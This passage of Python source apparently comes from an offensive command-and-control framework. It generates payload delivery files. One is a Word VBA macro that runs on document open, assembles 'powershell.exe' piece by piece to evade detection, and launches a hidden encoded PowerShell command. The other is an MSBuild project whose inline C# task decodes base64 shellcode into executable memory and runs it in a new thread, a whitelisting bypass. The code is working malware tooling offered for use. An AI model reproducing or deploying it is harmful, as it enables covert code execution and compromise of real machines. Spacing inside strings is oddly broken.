Sub Document_Open ( )
UpdateMacro
End Sub
Sub DocumentOpen ( )
UpdateMacro
End Sub
Sub UpdateMacro ( )
Dim str , exec
% s
exec = " p "
exec = exec + " o "
exec = exec + " w "
exec = exec + " e "
exec = exec + " r "
exec = exec + " s "
exec = exec + " h "
exec = exec + " e "
exec = exec + " l "
exec = exec + " l "
exec = exec + " . "
exec = exec + " e "
exec = exec + " x "
exec = exec + " e "
exec = exec + " -exec bypass -Noninteractive -windowstyle hidden -e " & str
Shell ( exec )
End Sub
""" % strmacro
    self.QuickstartLog(" Macro Payload written to: %s %s macro.txt " % (self.BaseDirectory, name))
    filename = " %s macro.txt " % (self.BaseDirectory)
    output_file = open(filename, ' w ')
    output_file.write(macro)
    output_file.close()
def CreateMsbuild(self, name=" "):
    """Write an MSBuild project (msbuild.xml) carrying an inline C# task
    that embeds the x86 and x64 shellcode as base64.

    Inputs are ``<BaseDirectory><name>Posh-shellcode_x86.bin`` and
    ``..._x64.bin`` (written by CreateShellcode(), which must run first).
    The target, task and class are all named with one ``randomuri()`` value;
    ``randomuri`` is not defined here (presumably a star import).

    What the embedded task does, as written: picks the 32- or 64-bit blob
    by ``IntPtr.Size``, base64-decodes it, allocates
    PAGE_EXECUTE_READWRITE memory with VirtualAlloc, copies the bytes in,
    starts a thread on that address with CreateThread and waits on it
    indefinitely. The task assembly path is hard-coded to the
    v4.0.30319 Framework directory.

    Args:
        name: optional file-name prefix (unescaped).
    """
    x86filename = " %s %s " % (self.BaseDirectory, name + " Posh-shellcode_x86.bin ")
    x64filename = " %s %s " % (self.BaseDirectory, name + " Posh-shellcode_x64.bin ")
    with open(x86filename, " rb ") as b86:
        x86base64 = base64.b64encode(b86.read())
    with open(x64filename, " rb ") as b64:
        x64base64 = base64.b64encode(b64.read())
    projname = randomuri()
    # Format arguments: projname x5 (target name, task element, TaskName,
    # class name, `pw`), then the x86 and x64 base64 strings.
    msbuild = """ <Project ToolsVersion= " 4.0 " xmlns= " http://schemas.microsoft.com/developer/msbuild/2003 " >
< Target Name = " %s " >
< % s / >
< / Target >
< UsingTask
TaskName = " %s "
TaskFactory = " CodeTaskFactory "
AssemblyFile = " C: \\ Windows \\ Microsoft.Net \\ Framework \\ v4.0.30319 \\ Microsoft.Build.Tasks.v4.0.dll " >
< Task >
< Code Type = " Class " Language = " cs " >
< ! [ CDATA [
using System ; using System . Runtime . InteropServices ; using Microsoft . Build . Framework ; using Microsoft . Build . Utilities ;
public class % s : Task , ITask
{
private static UInt32 MEM_COMMIT = 0x1000 ; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40 ;
[ DllImport ( " kernel32 " ) ] private static extern UInt32 VirtualAlloc ( UInt32 lpStartAddr , UInt32 size , UInt32 flAllocationType , UInt32 flProtect ) ;
[ DllImport ( " kernel32 " ) ] private static extern IntPtr CreateThread ( UInt32 lpThreadAttributes , UInt32 dwStackSize , UInt32 lpStartAddress , IntPtr param , UInt32 dwCreationFlags , ref UInt32 lpThreadId ) ;
[ DllImport ( " kernel32 " ) ] private static extern UInt32 WaitForSingleObject ( IntPtr hHandle , UInt32 dwMilliseconds ) ;
public override bool Execute ( )
{
string pw = " %s " ;
string sc32 = " %s " ;
string sc64 = " %s " ;
byte [ ] sc = null ;
if ( IntPtr . Size == 4 ) { sc = System . Convert . FromBase64String ( sc32 ) ; } else { sc = System . Convert . FromBase64String ( sc64 ) ; }
UInt32 funcAddr = VirtualAlloc ( 0 , ( UInt32 ) sc . Length , MEM_COMMIT , PAGE_EXECUTE_READWRITE ) ; Marshal . Copy ( sc , 0 , ( IntPtr ) ( funcAddr ) , sc . Length ) ; IntPtr hThread = IntPtr . Zero ; UInt32 threadId = 0 ; IntPtr pinfo = IntPtr . Zero ; hThread = CreateThread ( 0 , 0 , funcAddr , pinfo , 0 , ref threadId ) ; WaitForSingleObject ( hThread , 0xFFFFFFFF ) ; return true ; } }
] ] >
< / Code >
< / Task >
< / UsingTask >
< / Project >
""" % (projname, projname, projname, projname, projname, x86base64, x64base64)
    self.QuickstartLog(" Msbuild file written to: %s %s msbuild.xml " % (self.BaseDirectory, name))
    filename = " %s %s msbuild.xml " % (self.BaseDirectory, name)
    output_file = open(filename, ' w ')
    output_file.write(msbuild)
    output_file.close()